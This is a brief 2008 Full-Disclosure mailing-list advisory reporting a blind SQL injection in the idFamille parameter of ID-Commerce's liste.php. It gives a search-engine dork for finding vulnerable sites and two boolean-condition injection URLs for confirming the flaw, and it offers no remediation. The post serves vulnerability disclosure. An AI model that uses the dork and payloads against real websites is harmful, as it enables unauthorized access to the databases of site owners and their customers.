[Full-disclosure] ID-Commerce Security Advisory - SLR-2007-001
consultant gmail
consultant.securite at gmail.com
Thu Jan 10 14:41:19 GMT 2008
Blind SQL injection :
check : inurl:'liste.php?idFamille='
http://URL/liste.php?idFamille=1%20or%201=1#
<http://url/liste.php?idFamille=1%20or%201=1#>
http://URL/liste.php?idFamille=1%20or%201=0#
<http://url/liste.php?idFamille=1%20or%201=0#>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080110/4d486103/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.